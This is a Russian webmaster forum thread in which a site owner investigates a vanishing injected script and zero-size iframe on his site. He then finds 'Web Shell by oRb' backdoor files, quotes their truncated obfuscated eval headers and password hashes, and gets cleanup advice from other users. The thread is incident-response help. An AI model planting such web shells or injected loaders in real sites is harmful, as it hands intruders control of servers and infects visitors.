Форум Сайтостроение Веб-строительство

Взломали "умным" iframemом или у меня глюки?

12
T
На сайте с 06.10.2007
Offline
81
Thorin
1464

Как обычно захожу на свой сайт

И тут вдруг окошко нода выскакивает что заблокирована угроза с сайта.... я думаю что блин п***ц опять зараза на сайт попала.

Захожу в панель вебмастера гугл, сообщений нету

открываю на ndex.php исходный код страницы и что и в самом низу я вижу 

<!-- MarketGidGoods Start -->

<script type="text/javascript">

var MarketGidDate = new Date();

document.write('<scr'+'ipt type="text/javascript" '+'src="http://jsg.dt00.net/a/l/****s?t='+MarketGidDate.getYear()+MarketGidDate.getMonth()+'"'+ '" charset="windows-1251" ></scr'+'ipt>');

</script>

<nofollow><noindex><iframe src="" width="0" height="0" frameborder="0"></iframe></script></noindex></nofollow>



<!-- MarketGidGoods End -->

Интересно почему он с маркетгидом тусит?:)

Открываю файл где размещен этот кусок кода (footer.tpl) 

<!-- MarketGidGoods Start -->

<script type="text/javascript">

var MarketGidDate = new Date();

document.write('<scr'+'ipt type="text/javascript" '+'src="http://jsg.dt00.net/a/l/*****.js?t='+MarketGidDate.getYear()+MarketGidDate.getMonth()+'"'+ '" charset="windows-1251" ></scr'+'ipt>');

</script>

<!-- MarketGidGoods End -->

А там ничего нету!

Сохраняю файл, обновляю страницу и кода уже нету:eek:

Проверил лог доступа по фтп, с 30 января файлы сайта не трогались

Скачал бекап сайта, проверил нодом, тоже чисто

Вопрос, что это было? И как он так появился и исчез?

LEOnidUKG
На сайте с 25.11.2006
Offline
1774
LEOnidUKG
#1

Кто хостер?

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/
T
На сайте с 06.10.2007
Offline
81
Thorin
#2
LEOnidUKG:
Кто хостер?

у меня отдельный сервер, я думаю что от хостера не зависит)

LEOnidUKG
На сайте с 25.11.2006
Offline
1774
LEOnidUKG
#3
Thorin:
у меня отдельный сервер, я думаю что от хостера не зависит)

Зависит.

1. Какой движок?

2. Проверьте, модуля никакие не подключались и не изменялись для веб-сервера.

T
На сайте с 06.10.2007
Offline
81
Thorin
#4
LEOnidUKG:
Зависит.

1. Какой движок?
2. Проверьте, модуля никакие не подключались и не изменялись для веб-сервера.

сервер арендую у фрихост.ком.уа

1. Очень древний движок Lore 1.5.6

2. Вроде ничего не подключалось и не изменялось (судя по дате изменения файлов апача)

N
На сайте с 06.05.2007
Offline
419
netwind
#5
Thorin:
Сохраняю файл, обновляю страницу и кода уже нету

Это типичное поведение, если они по два раза не заражают посетителей.

Запасись терпением и ip-шниками. Можешь программно в первой строчке скрипта имитировать смену IP в конце концов. Хотя, в зависимости, от способа проверки это может не прокатить.

Раз не видно в шаблонах, то это может быть вставлено в любой обычно "молчащий" php код. Например, видел фокусы с перехватом вывода и модификацией готового к выводу html через регулярное выражение.

Thorin:
2. Вроде ничего не подключалось и не изменялось (судя по дате изменения файлов апача)

Разворачивай еще более старый бекап и сравнивай содержимое файлов - такие программы есть. Изменение в код могло быть внесено давно, но активация произошла только сейчас.

Будет совсем туго - обращайся.

Кнопка вызова админа ()
Manul антивирус Яндекса для Секреты индексации динамических страниц Яндекс.Директ ответил на частые
ДП
На сайте с 23.11.2009
Offline
203
Дикий пионер
#6

Еще как вариант найти этот движок на оффсайте нужную версию и с ней файлы сравнивать.

T
На сайте с 06.10.2007
Offline
81
Thorin
#7

старых бекапов нету...

в папке var есть файл, var.php

содержания типа

<?php #Web Shell by oRb
$auth_pass = "63a9f0ea7bb98050796b649e85481845"; #root
$color = "#df5";
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C......................

дата модификации 2010 год, немного еще поискав

в папке cp\templates файл conf.php


<?php # Web Shell by oRb
$auth_pass = "85b76548c1b6f822366ed0821219b6f7";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\..................................

дата модификации 2007 год (время создания сайта и заливка остальных файлов)

выходит что я скрипт скачал изначально с шелом, а потом его просто обновили?

сайт я сам модифицировал, доступ к загрузке файлов имею только я. Возможно этот шел еще гдето следы оставляет?

Учет времени последней модификации Бандит угрожает убийством сайта Как безопасно передавать доступы
t0os
На сайте с 25.02.2008
Offline
64
t0os
#8

Ну, на шелл похоже. Ищите дырки в движке.

N
На сайте с 06.05.2007
Offline
419
netwind
#9
Thorin:
сайт я сам модифицировал, доступ к загрузке файлов имею только

ну ты же не весь же сайт перелопатил?

целесообразно найти оригинальные исходники той же версии и сверить файлы.

Возможно этот шел еще гдето следы оставляет?

шелл - это инструмент широко назначения. значит злоумышленник мог выдумать что угодно, чтобы скрыть iframe.

кроме того, не обязательно что шелл вообще использовался для вставки iframe. он мог быть сам по себе.

Нужен хостинг с защитой Резкое падение позиций в Яндекс нашел вирус на
T
На сайте с 06.10.2007
Offline
81
Thorin
#10

Файлы все обязательно вечером перелопатю)

На хакер.ру

Уязвимости - Lore
SQL-инъекция в Lore
29.01.2009
Эксплоит: есть

Межсайтовый скриптинг в Lore
28.07.2008

SQL-инъекция в Lore
07.06.2006

SQL-инъекция в Lore
13.12.2005
Эксплоит: есть

Разве возможно через эти уязвимости загрузить шел?

(Там почти все в одном месте я думаю что сам подлатаю)

Раньше когда сохранял пароли в КутФТП, 1 или 2 раза прописывался ифрейм внизу во всех index main файлах, возможно тогда и залили шел?

Хакеры активно эксплуатируют уязвимость В плагине Easy WP В WordPress закрыли три
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий